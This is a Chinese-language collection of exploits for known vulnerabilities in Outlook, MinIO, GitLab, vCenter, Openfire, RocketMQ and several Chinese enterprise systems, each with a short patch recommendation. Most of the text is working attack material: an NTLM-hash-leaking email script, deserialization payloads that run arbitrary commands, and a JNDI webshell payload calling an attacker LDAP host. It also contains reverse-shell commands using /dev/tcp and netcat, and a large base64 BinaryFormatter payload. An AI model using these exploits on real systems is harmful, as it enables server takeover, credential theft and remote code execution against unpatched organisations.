parser.add_argument('--url',help='target url',required=False)
args = parser.parse_args()
if args.url:
Exploit(args.url)
if args.file:
with open (args.file) as f:
for i in f.readlines():
i = i.strip()
Exploit(i)
if __name__ == '__main__':
main()
修复建议
受影响用户及时更新升级到以下修复版本:
-
Spring Framework >= 6.0.7 -
Spring Framework >= 5.3.26
下载链接:
https://spring.io/projects/spring-framework
29、Microsoft Outlook 权限提 升漏洞
该漏洞存在于 Microsoft Outlook 中,是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件,从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。
漏洞标签:漏洞细节公开、利用条件简单
漏洞编号:CVE-2023-23397
漏洞类型:认证绕过
受影响版本:
-
Microsoft Outlook 2016 (64-bit edition) -
Microsoft Outlook 2013 Service Pack 1 (32-bit editions) -
Microsoft Outlook 2013 RT Service Pack 1 -
Microsoft Outlook 2013 Service Pack 1 (64-bit editions) -
Microsoft Office 2019 for 32-bit editions -
Microsoft 365 Apps for Enterprise for 32-bit Systems -
Microsoft Office 2019 for 64-bit editions -
Microsoft 365 Apps for Enterprise for 64-bit Systems -
Microsoft Office LTSC 2021 for 64-bit editions -
Microsoft Outlook 2016 (32-bit edition) -
Microsoft Office LTSC 2021 for 32-bit editions
利用方法:
exp
importsmtplib, datetime, argparsefromemail.mime.multipartimportMIMEMultipartfromemail.mime.textimportMIMETextfromemail.mime.applicationimportMIMEApplicationfromemail.utilsimportCOMMASPACE, formatdatefromindependentsoft.msgimportMessage
# Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587
sender_email = "[email protected]"
sender_password = "P@ssw0rd"
recipients_email = ["[email protected]"]
class Email:
def __init__(self, smtp_server, port, username, password, recipient):
self.smtp_server = smtp_server
self.port = port
self.username = username
self.password = password
self.recipient = recipient
def send(self, subject, body, attachment_path):
msg = MIMEMultipart()
msg['From'] = self.username
msg['To'] = COMMASPACE.join(self.recipient)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f:
part = MIMEApplication(f.read(), Name=attachment_path)
part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
msg.attach(part)
try:
server = smtplib.SMTP(self.smtp_server, self.port)
server.starttls()
server.login(self.username, self.password)
server.sendmail(self.username, self.recipient, msg.as_string())
server.quit()
print("[+] Malicious appointment sent !")
except Exception as e:
print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()
appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")
运行指令
python CVE-2023-23397.py --path'\yourip'
修复建议
目前微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁,建议受影响用户开启系统自动更新安装补丁进行防护。
注:由于网络问题、计算机环境问题等原因,Windows Update 的补丁更新可能出现失败。用户在安装补丁后,应及时检查补丁是否成功更新。右键点击Windows 徽标,选择“设置(N)”,选择“更新和安全”-“Windows 更新”,查看该页面上的他提示信息,也可点击“查看更新历史记录”查看历史更新情况。
针对未成功安装更新补丁的情况,可直接下载离线安装包进行更新,链接如下:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397
临时防护措施
若用户无法正常进行补丁修复,在不影响正常业务的情况下,可使用以下措施对漏洞进行防护:
1、将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。
注意:该操作可能会对需要 NTLM 的应用程序造成一定影响。
详情请参考:
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
2、用户可通过在网络中同时使用外围防火墙和本地防火墙,并通过 VPN 设置来阻止 TCP 445/SMB 从网络出站。
注意:该操作将禁止发送 NTLM 身份验证消息到远程文件共享。
30、MinIO 信息泄露漏洞
在集群部署的 MinIO 中,未经身份认证的远程攻击者通过发送特殊 HTTP请求即可获取所有环境变量,其中包括 MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD,造成敏感信息泄露,最终可能导致攻击者以管理员身份登录 MinIO。
漏洞标签:涉及重点系统
漏洞编号:CVE-2023-28432
漏洞类型:信息泄露
受影响版本:
-
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
利用方法:
访问并抓包http://xxx.com/minio/bootstrap/v1/verify可获取 泄露的MINIO_ROOT_USER 和MINIO_ROOT_PASSWORD 值 ,并可直接登陆系统
poc
POST /minio/bootstrap/v1/verify HTTP/1.1Host:192.168.69.81:9000Cache-Control: max-age=0Upgrade-Insecure-Requests:1User-Agent: MozillaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
可以使用curl
curl -XPOST http://192.168.186.148:9003/minio/bootstrap/v1/verify
修复建议
目前官方已发布安全修复版本,受影响用户可以升级到RELEASE.2023-03-20T20-16-18Z 及以上版本。
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z
临时修复方案,在 waf/ips 等安全产品上配置策略,拒绝所有 post 到/minio/bootstrap/v1/verify 流量。
31、畅捷通 T+ 前台远程命令执行漏洞
由于畅捷通 T+前台存在反序列化漏洞,恶意攻击者成功利用此漏洞可在目标服务器上执行任意命令。
漏洞标签:服务器权限相关、利用链成熟、国产办公系统、利用条件简单
漏洞编号:QVD-2023-13615
漏洞类型:RCE
受影响版本:
-
T+13.0 -
T+16.0
利用方法:
poc
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: your-ipX-Ajaxpro-Method: GetStoreWarehouseByStore{"storeID":{}}
使用ysoserial.net工具构造payload
./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c"执行的命令"
exp
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: your-ipX-Ajaxpro-Method: GetStoreWarehouseByStore{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo": {"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c 执行的命令"}}}}
修复建议
目前官方已修复该漏洞,受影响用户可以升级更新到安全版本。官方下载链接:
https://www.chanjetvip.com/product/goods/
32、泛微 e-cology 前台任意用户登录漏洞
泛微 e-cology 前台任意用户登录漏洞:泛微 e-cology9 部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
漏洞标签:利用链成熟、国产办公系统、利用条件简单
漏洞编号:无
漏洞类型:认证绕过
受影响版本:
-
部分 e-cology9 并且补丁版本 < 10.57
利用方法:
poc
/mobile/plugin/1/ofsLogin.jsp?syscode=syscode×tamp=2&gopage=3&receiver=test&loginTokenFromThird=
修复建议
目前,官方已发布修复建议,建议受影响的用户尽快升级至最新版本的补丁。
下载地址:
https://www.weaver.com.cn/cs/securityDownload.asp#
33、Openfire 控制台权限绕过漏洞
Openfire 的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire管理控制台中的后台页面。同时由于 Openfire 管理控制台的后台ᨀ 供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
漏洞标签:漏洞细节公开、服务器权限相关、利用条件简单
漏洞编号:CVE-2023-32315
漏洞类型:认证绕过
受影响版本:
-
3.10.0 <= Openfire < 4.6.8、4.7.5
利用方法:
exp
https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
运行指令
单个url go run main.go -u http://openfire.com:9090多个url go run main.go -l url.txt -t20
修复建议
临时缓解方案:
使用网络 ACL 限制访问控制台的来源,而且建议如非必要,不要将 Openfire管理控制台暴露在互联网上。
升级修复方案:
该问题已在 Openfire 的 4.7.4 和 4.6.8 版本中得到修补,建议升级到不受漏洞影响的版本。
34、Apache RocketMQ 远程代码执行漏洞
此漏洞是由于 CVE-2023-33246 补丁未修复完全,当 RocketMQ 的NameServer 组件暴露在外网,且缺乏有效的身份认证时,攻击者可以利用更新配置功能,以 RocketMQ 运行的系统用户身份执行任意命令。
漏洞标签:漏洞细节公开、影响范围广、漏洞价值大
漏洞编号:CVE-2023-37582
漏洞类型:RCE
受影响版本:
-
RocketMQ < 4.9.7 -
RocketMQ < 5.1.2
利用方法:
poc
importsocketimportbinasciiclient = socket.socket()client.settimeout(5)client.connect((target_ip,target_port))# make payloadjson ='{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')body=('Thanks DawnT0wn').encode('utf-8')json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)head1 ='00000000'+str(hex(json_lens))[2:]all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)head2 ='00000000'+str(hex(all_lens))[2:]data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')# sendclient.send(bytes.fromhex(data))data_recv = client.recv(1024)
修复建议
目前官方已发布安全版本,建议受影响用户升级至:
· RocketMQ 5.x >= 5.1.2
· RocketMQ 4.x >= 4.9.7
官方补丁下载地址:
https://rocketmq.apache.org/download/
同时建议将 NameServer、Broker 等组件部署在内网,并增加权限认证
35、用友 NC Cloud 远程代码执行漏洞
用友 NC 及 NC Cloud 系统存在任意文件上传漏洞,攻击者可通过 uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给 NC 服务器预埋后门,从而可以随意操作服务器。
漏洞标签:漏洞细节公开、影响范围广、涉及重点系统、国产办公系统
漏洞编号:CNVD-C-2023-76801
漏洞类型:RCE
受影响版本:
-
NC63、NC633、NC65 -
NC Cloud1903、NC Cloud1909 -
NC Cloud2005、NC Cloud2105、NC Cloud2111 -
YonBIP 高级版 2207
利用方法:
exp
需要JNDI
https://github.com/WhiteHSBG/JNDIExploit
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1Host: your-ipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests:1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/114.0{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}
EXP中使用的是JNDI工具的TomcatEcho回显链
执行命令并回显
GET /jndi.jsp HTTP/1.1Host: your-ipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests:1User-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/114.0cmd: whoami
修复建议
-
官方已经发布修复补丁,请进行升级。 -
或者进行 waf 等安全部署拦截恶意字符
36、Gitlab 远程代码执行漏洞
GitLab 某些端点的路径存在无需授权风险,攻击者可在无需认证的情况下完成图片上传,并利用该漏洞构造恶意数据执行远程命令,最终造成服务器敏感信息泄露或执行任意命令。
漏洞标签:利用链成熟、影响范围广
漏洞编号:CVE-2021-22205
漏洞类型:RCE
受影响版本:
-
11.9 <= GitLab(CE/EE)< 13.8.8 -
13.9 <= GitLab(CE/EE)< 13.9.6 -
13.10 <= GitLab(CE/EE)< 13.10.3
利用方法:
exp
https://github.com/Al1ex/CVE-2021-22205
运行指令
漏洞检测 python3 CVE-2021-22205.py -v true -t http://xx.xx.xx.xx:xx/dnslog回显 python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c"curl http://xx.xx.xx.xx/1.txt"反弹shell# 写入反弹shell脚本python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c"echo 'bash -i >& /dev/tcp/4.xx.xx.6/6666 0>&1' > /tmp/1.sh"# 给执行权限python3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c"chmod +x /tmp/1.sh"# 服务器监听6666端口nc -lvnp6666# 运行,获取git权限shellpython3 CVE-2021-22205.py -a true -t http://xx.xx.xx.xx:xx/ -c"/bin/bash /tmp/1.sh"
修复建议
1、设置 Gitlab 仅对可信地址开放;
2、升级至安全版本:
GitLab(CE/EE) >= 13.8.8
GitLab(CE/EE) >= 13.9.6
GitLab(CE/EE) >= 13.10.3
37、Vmware vcenter 远程代码执行漏洞
vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,从而在服务器上写入 webshell,最终造成远程任意代码执行。
漏洞标签:利用链成熟、影响范围广、服务器权限相关
漏洞编号:CVE-2021-21972
漏洞类型:RCE
受影响版本:
-
VMware vCenter Server 7.0 系列 < 7.0.U1c -
VMware vCenter Server 6.7 系列 < 6.7.U3l -
VMware vCenter Server 6.5 系列 < 6.5 U3n -
VMware ESXi 7.0 系列 < ESXi70U1c-17325551 -
VMware ESXi 6.7 系列 < ESXi670-202102401-SG -
VMware ESXi 6.5 系列 < ESXi650-202102101-SG
利用方法:
poc
importrequestsfromrequests.packagesimporturllib3urllib3.disable_warnings()importargparseimportosdefurl():parser = argparse.ArgumentParser(description='vCenter 6.5-7.0 RCE 漏洞复现(CVE-2021-21972)POC')parser.add_argument('target_url',type=str,help='The target address,example: https://192.168.140.153:4445')args = parser.parse_args()globalurlurl = args.target_urlifurl.startswith('http://')orurl.startswith('https://'):passelse:print('[-]Please include http:// or https:// in the URL!!')os._exit(0)ifurl.endswith('/'):url = url[:-1]print('[+]author:chenchen')print("[-]目标地址:",url)print("[-]正在执行漏洞检测...")returnurldefpoc():headers={'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36',"Content-Type":"application/x-www-form-urlencoded"}url_v = url +'/ui/vropspluginui/rest/services/updateova'try:code = requests.get(url=url_v,headers=headers,timeout=4,verify=False).status_codeprint('status_code:',code)ifcode ==405:print('[+]漏洞存在')else:print('[-]漏洞不存在')except:print('[-]发生错误')if__name__ =='__main__':url()poc()
修复建议
vCenter Server7.0 版本升级到 7.0.U1c
vCenter Server6.7 版本升级到 6.7.U3l
vCenter Server6.5 版本升级到 6.5 U3n
38、金蝶 K3Cloud 反序列化漏洞
由于金蝶云星空能够使用 format 参数指定数据格式为二进制,攻击者可以通过发送由 BinaryFormatter 恶意序列化后的数据让服务端进行危险的BinaryFormatter 反序列化操作。反序列化过程中没有对数据进行签名或校验,导致攻击者可以在未授权状态下进行服务器远程代码执行。
漏洞标签:涉及重点系统、国产办公系统、服务器权限相关
漏洞编号:无
漏洞类型:RCE
受影响版本:
-
金蝶云星空 < 6.2.1012.4 -
7.0.352.16 < 金蝶云星空 <7.7.0.202111 -
8.0.0.202205 < 金蝶云星空 < 8.1.0.20221110
利用方法:
poc
需要 ysoserial.net工具构造恶意序列化数据
POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1Host: your-ipContent-Type: text/json{"ap0":"asdas","format":"3"}
.ysoserial.exe -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c"a.cs;System.Windows.Forms.dll;System.Web.dll;System.dll"
exp
POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1Host: your-ipContent-Type: text/jsoncmd: dir{"ap0":"AAEAAAD/AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rp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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAADgNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA